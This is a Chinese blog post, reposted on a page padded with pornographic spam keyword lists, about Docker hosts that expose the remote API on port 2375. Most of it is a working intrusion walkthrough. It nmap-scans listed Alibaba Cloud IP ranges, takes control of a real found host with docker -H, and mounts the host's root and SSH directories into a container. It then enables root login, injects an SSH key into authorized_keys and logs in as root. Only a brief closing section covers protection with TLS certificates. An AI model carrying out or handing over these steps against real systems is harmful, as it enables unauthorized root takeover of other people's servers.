日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区

您的位置:首頁技術文章
文章詳情頁

Docker暴露2375端口導致服務器被攻擊問題及解決方法

瀏覽:359日期:2024-11-21 11:23:18

相信了解過docker remote API的同學對2375端口都不陌生了,2375是docker遠程操控的默認端口,通過這個端口可以直接對遠程的docker daemon進行操作。

當$HOST主機以docker daemon -H=0.0.0.0:2375方式啟動daemon時,可以在外部機器對$HOST的docker daemon進行直接操作:

docker -H tcp://$HOST:2375 ps

好,說說如何“入侵”,怎么通過這個端口入侵宿主機呢?

這個應該要從幾個點說起吧:1. docker對user namespace沒有做隔離,也就是說,容器內部的root用戶就是宿主機的root用戶,一旦掛載目錄,就可以在容器內部以宿主機的root用戶身份對掛載的文件系統隨意修改了。

docker服務擁有很高的執行權利(相當于root),并且在docker用戶組下的普通用戶不需要任何其他驗證就可以執行docker run等命令。 暴露的docker remote API端口如果沒有啟動ssl驗證的話,任何能連通到這臺docker宿主機的的機器都可以隨意操作這臺docker宿主機的docker daemon(docker run、docker ps、docker rm等等這些命令都不在話下)。

結合以上3點,就基本具備入侵docker宿主機的條件了

講得似乎有點懸,不多說,直接拿一個活鮮鮮的例子來講吧:

(請允許我用最近新學的一道菜將流程帶過 ?( ̄? ̄)? )

秘制紅燒肉(docker版)

材料:一整塊一整塊的“5花”IP段,越肥越好(小白用戶越多越好)

配料:nmap,docker

step 1: 掃描2375端口

怎么掃?我選用的是簡單易用的黑客必備神器nmap了。

掃哪里呢?我選的目標是aliyun的IP段,百度得知:

42.96.128.0/17 Alibaba (Beijing) Technology Co., Ltd. China 42.120.0.0/16 Aliyun Computing Co., LTD China 42.121.0.0/16 Aliyun Computing Co., LTD China 42.156.128.0/17 Aliyun Computing Co., LTD China 110.75.0.0/16 Asia Pacific Network Information Centre China 110.76.0.0/19 Ali Technology Co., Ltd China 110.76.32.0/20 Aliyun Computing Co., LTD China 110.173.192.0/20 HiChina Web Solutions (Beijing) Limited China 110.173.208.0/20 HiChina Web Solutions (Beijing) Limited China 112.124.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 112.127.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 114.215.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 115.28.0.0/16 HiChina Web Solutions (Beijing) Limited China 115.29.0.0/16 HiChina Web Solutions (Beijing) Limited China 115.124.16.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 115.124.20.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 115.124.24.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 119.38.208.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 119.38.216.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 119.42.224.0/20 Alibaba (China) Technology Co., Ltd. China 119.42.242.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 119.42.244.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 121.0.16.0/21 Hangzhou Alibaba Advertising Co.,Ltd. China 121.0.24.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 121.0.28.0/22 Hangzhou Alibaba Advertising Co.,Ltd. China 121.196.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 121.197.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 121.198.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 121.199.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 140.205.0.0/16 Aliyun Computing Co., LTD China 203.209.250.0/23 Hangzhou Alibaba Advertising Co.,Ltd. China 218.244.128.0/19 Hangzhou Alibaba Advertising Co.,Ltd. China 223.4.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 223.5.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 223.5.5.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 223.6.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd. China 223.6.6.0/24 Hangzhou Alibaba Advertising Co.,Ltd. China 223.7.0.0/16 Hangzhou Alibaba Advertising Co.,Ltd.

我不生產IP,我只是百度的搬運工,別問我這些IP從那來,我也想知道~ >.<

將上面IP內容保存在一個文件中,如 aliyun.list

開始掃描:

cat aliyun.list| awk ’{print $1}’ | xargs -n 1 -I {} nmap -sT -p2375 {} --open # 簡單解釋一下命令:# awk 將第一列IP網段過濾出來# xargs 將過濾出來的IP一個一個的分次送給nmap,-I {} 是指使用{}來代替傳送的參數# ...# Starting Nmap 7.01 ( https://nmap.org ) at 2016-06-05 09:57 CST# Nmap scan report for 42.96.MOSAIC.MOSAIC# Host is up (0.070s latency).# PORT STATE SERVICE# 2375/tcp open docker# ...

不到兩分鐘,第一塊42.96.MOSAIC.MOSAIC(五花肉已打碼) “五花肉”選好了,來吧~

step 2: 測試2375的直接控制權

docker -H tcp://42.96.MOSAIC.MOSAIC:2375 ps # CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS # 73aa690e7c92 imdjh/owncloud-with-ocdownloader '/entrypoint.sh' 9 days ago Up 3 days 0.0.0.0:9009->80# f57c56af0e29 rethinkdb:2.3.2 'rethinkdb --bind all' 9 days ago Up 3 days 8080/tcp, 28015/# 37c1401db593 gaomd/ikev2-vpn-server:0.3.0 '/bin/sh -c /usr/bin/' 10 days ago Up 3 days 0.0.0.0:500->500# af7338a5426d nginx:1.9-alpine 'nginx -g ’daemon off' 3 weeks ago Up 3 days 443/tcp, 0.0.0.0# ...

這個服務器的owner也太配合了(⊙ο⊙),ps直接看到內容,說明這個主機的2375是沒有ssl驗證的,基本滿足入侵要求。

“五花”洗好,切好,準備下鍋~

step 3: 遠程啟動自己的容器

拿到了docker的控制權能做什么呢?拿到了就呵呵了~

# images 看看本地已有的鏡像# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 images# ...# swarm latest 47dc182ea74b 4 weeks ago 19.32 MB# jwilder/nginx-proxy latest 203b20631e41 4 weeks ago 255.6 MB# ubuntu latest c5f1cf30c96b 4 weeks ago 120.8 MB# shipyard/shipyard latest ba426f0944bc 5 weeks ago 58.92 MB# ...

省略了一部分輸出,鏡像還蠻多的,就選個ubuntu吧

# docker -H tcp://42.96.MOSAIC.MOSAIC:2375 run --rm -it --entrypoint bash -v /root:/tmp/root -v /etc/ssh:/tmp/ssh_etc -v /var/log:/tmp/log ubuntu

看到這步,相信對ssh有一些了解的同學應該就明白了

step 4: ssh pub key 注入

在剛剛啟動的容器中先看看 /tmp/ssh_etc/sshd_config (就是宿主機的/etc/ssh/sshd_config) 的PermitRootLogin字段。如果是no就改成yes,允許root通過ssh登錄

然后在你的機器上生成一對新的pub key(已經有ssh key的也建議生成一個新的,不要使用自己日常使用的ssh pub key)

# 使用 ssh-keygen生成ssh-keygen -t rsa -C 'hello@world.com'# 執行命令后的提示Enter file in which to save the key要看好,不要把自己的ssh key覆蓋了,可以選著/tmp/id_rsa# 其他提示enter到底即可

繼續,注入ssh pub key,回到剛剛啟動的容器執行

cat >> /tmp/root/.ssh/authorized_keys <<EOF>ssh-rsa AAA.... # 這里粘貼你剛剛在自己機器生成的/tmp/id_rsa.pub>EOF # 如果/tmp/root/.ssh目錄不存在,就直接創建

八角香葉生抽老抽醋都加上,中火烹飪,準備出鍋~

step 5: 登入服務器

# ssh -i 指定秘鑰登錄ssh -i /tmp/id_rsa root@42.96.MOSAIC.MOSAIC # Welcome to Ubuntu 14.04.1 LTS (GNU/Linux 3.13.0-32-generic x86_64)## * Documentation: https://help.ubuntu.com/## Welcome to aliyun Elastic Compute Service!## Last login: Fri Jun 3 01:38:07 2016 from 120.85.MOSAIC.MOSAIC# manpath: can’t set the locale; make sure $LC_* and $LANG are correct# root@iZ28p9b7e***:~# # ...

大火收汁,起鍋!

鄭重聲明

以上教程僅為交流學習之用,42.96.MOSAIC.MOSAIC 服務器上的id_rsa.pub在制作完本教程后已主動清除,并在服務上留言告知。

如果你一不小心也發現了可用的2375端口,希望也能點到即止,誤做他用,或者發現其他入侵漏洞,可以和大家交流學習。

2375是docker漏洞嗎?

非也!2375直接裸露地暴露在公網上純屬是用戶習慣或者偷懶的問題2375可以在相對安全的內部網絡中方便測試使用,并不適合使用在投入到生產環境中。

docker官網第一篇文檔quick start上有句話是這樣子的:

Warning: Changing the default docker daemon binding to a TCP port orUnix docker user group will increase your security risks by allowingnon-root users to gain root access on the host. Make sure you controlaccess to docker. If you are binding to a TCP port, anyone withaccess to that port has full Docker access; so it is not advisable on an open network.

已經Warning告知:如果將daemon直接暴露在一個TCP端口,將可能會被以非root用戶去獲取宿主機的root權限。其實上面的說提到的服務器之所以這么容器被入侵,也正是這個原因。

何以防之

那么,問題來了,如果想用Remote API,又不想有被入侵的風險,怎么辦呢?

docker官方文檔上介紹了一種通過CA認證方式使用Remote API

具體可以參考:Protect the Docker daemon socket

(等理解了再補一篇博客吧,就姑且讓我以一個鏈接的形式帶過吧O.O)

配置過程還算是比較簡單的,下面放一張圖,展示配置SSL后的效果:

Docker暴露2375端口導致服務器被攻擊問題及解決方法

到此這篇關于Docker暴露2375端口導致服務器被攻擊問題及解決方法的文章就介紹到這了,更多相關docker 暴露2375 端口內容請搜索好吧啦網以前的文章或繼續瀏覽下面的相關文章希望大家以后多多支持好吧啦網!

標簽: Docker
相關文章:
日本不卡不码高清免费观看,久久国产精品久久w女人spa,黄色aa久久,三上悠亚国产精品一区二区三区
国产精品chinese| 亚洲小说春色综合另类电影| 欧美一区91| 久久久久国产| 制服诱惑一区二区| 欧美精品aa| 国产精品99一区二区三| 精品九九在线| 亚洲精品1区2区| 亚洲精品黄色| 国产精品欧美在线观看| av中文字幕在线观看第一页| 五月婷婷亚洲| 久久99伊人| 热久久国产精品| 亚洲另类黄色| 国产亚洲精品精品国产亚洲综合 | 亚洲特级毛片| 91亚洲成人| 麻豆理论在线观看| 免费成人在线观看| 亚洲日本欧美| 国产色噜噜噜91在线精品| 国产在线不卡一区二区三区| 97精品国产福利一区二区三区| 中文字幕一区二区三区四区久久| 国产一区二区三区亚洲| 精品一区亚洲| 国产劲爆久久| 色老板在线视频一区二区| 激情欧美亚洲| 久久国产亚洲精品| 国产欧美日韩一区二区三区在线| 欧美日韩国产传媒| 精品亚洲成人| 国产精品白浆| 国产精品美女久久久| 国产欧美日韩精品一区二区三区| 日韩视频不卡| 亚洲午夜国产成人| 国产精品久久久久毛片大屁完整版| 日韩av专区| 欧美女激情福利| 亚洲毛片视频| 国模精品一区| 精品久久电影| 激情综合网址| 亚州av一区| 婷婷亚洲成人| 亚洲调教视频在线观看| 天堂av在线一区| 国精品一区二区三区| 日韩av二区| 最近高清中文在线字幕在线观看1| 国产剧情一区| 国产美女精品视频免费播放软件| 国产日韩欧美三级| 亚洲精品免费观看| 日韩av一级| 成人羞羞在线观看网站| 午夜宅男久久久| 尤物网精品视频| 亚洲啊v在线免费视频| 一本综合精品| 国产精品99久久免费观看| 日本午夜精品久久久久| 亚洲久久在线| 91看片一区| 亚洲成人三区| 欧美a级一区二区| 亚洲电影在线一区二区三区| 国产精品亚洲片在线播放| 欧美亚洲国产精品久久| 日本精品久久| 午夜国产精品视频免费体验区| 日韩成人a**站| 国产精品入口久久| 国产伦理一区| 日韩一区精品| 亚洲欧美不卡| 亚洲综合婷婷| 国产精品久久久久久av公交车| 日韩av一区二区三区四区| 国产欧美一区二区三区米奇| 欧美xxxx中国| 日韩精品午夜| 天堂av在线一区| 日韩在线一区二区| 午夜久久av| 欧美特黄一级大片| 麻豆中文一区二区| 久久中文字幕一区二区三区| 日韩欧美一区二区三区免费观看| 亚洲一区二区日韩| 美女国产精品久久久| 国产农村妇女精品一二区| 国产视频久久| 国产精品探花在线观看| 欧美不卡在线| 国产suv精品一区| 日韩二区三区四区| 91成人精品视频| 国内精品美女在线观看| 日韩中文字幕麻豆| 99久久精品费精品国产| 亚洲欧美日本日韩| 在线 亚洲欧美在线综合一区| 特黄毛片在线观看| 亚洲四虎影院| 好吊视频一区二区三区四区| 精品一区二区三区免费看| 久久uomeier| 久久影院资源站| 亚洲欧洲专区| 天堂av在线| 电影91久久久| 尤物在线精品| 91综合视频| 亚洲精品进入| 国产精品一区二区三区av麻| 日韩av字幕| 久久精品在线| 黄色网一区二区| 国产黄色一区| 日韩精品91| 亚洲精品一区二区妖精| 激情欧美一区二区三区| 在线一区视频观看| 日韩精品电影一区亚洲| 美女毛片一区二区三区四区| 色在线中文字幕| 91嫩草亚洲精品| 精品五月天堂| 成人国产精品一区二区网站| 国产网站在线| 国产精品chinese| 国产精品成人**免费视频| 国产美女撒尿一区二区| 91精品国产91久久久久久黑人| 综合激情网站| 日本国产一区| 国产精品毛片在线| 综合五月婷婷| 综合激情网...| 美女av一区| 午夜久久福利| 亚洲日本欧美| 国产精品成人国产| 久久国产影院| 亚洲视频国产| 日韩欧美2区| 国产精品免费大片| 91精品亚洲| 精品国产欧美| 天堂av一区| 欧美一区=区| 日韩欧美一区二区三区在线观看 | 日韩av三区| 日韩福利视频一区| 欧美日中文字幕| 一区二区三区四区精品视频| 国产三级一区| 电影亚洲精品噜噜在线观看| 国产一在线精品一区在线观看| 日韩影院在线观看| 欧美日韩夜夜| 国产精品原创| 99视频一区| 国产欧美一区二区三区精品观看| 国产精品成久久久久| 99久久99视频只有精品| 中文字幕一区二区三区四区久久| 日韩精品中文字幕吗一区二区| 欧美日韩网址| 蜜桃视频免费观看一区| 欧美午夜精彩| 欧美激情一区| 成人羞羞视频在线看网址| 国产精品香蕉| 欧美一级专区| 日韩成人精品一区| 麻豆久久一区| 国产精品第一国产精品| 亚洲精品一级| 水野朝阳av一区二区三区| 中文一区一区三区高中清不卡免费| 国产日韩在线观看视频| 在线亚洲国产精品网站| 国产毛片久久| 亚洲一区二区动漫| 欧美日韩三区| 狠狠爱成人网| 日韩国产在线一| 麻豆理论在线观看| 最新亚洲国产| 精品国产美女a久久9999| 日韩理论视频| 日韩精品一区二区三区免费观影| 免费视频亚洲| 日韩精品诱惑一区?区三区|